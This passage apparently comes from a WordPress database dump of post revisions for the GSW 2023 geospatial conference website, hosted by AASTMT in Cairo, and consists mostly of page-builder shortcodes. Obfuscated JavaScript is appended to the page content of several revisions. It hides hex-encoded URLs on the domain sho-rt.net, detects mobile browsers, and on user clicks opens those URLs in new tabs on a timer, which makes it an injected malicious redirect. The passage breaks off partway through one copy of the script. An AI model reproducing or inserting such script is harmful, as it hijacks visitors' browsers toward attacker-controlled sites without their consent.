00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 16:17:45','2022-11-09 16:17:45','',3066,'https://gsw2023.com/?p=3157',0,'revision','',0),
(3158,1,'2022-11-09 16:18:25','2022-11-09 16:18:25','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h3>EGYPT GSW\'2023</h3>\r\n<h3>The First Geospatial Week in Africa and The Middle East</h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^2275|url^https://gsw2023.com/wp-content/uploads/2022/10/aast32.jpg|caption^null|alt^null|title^aast32|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668010285886{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 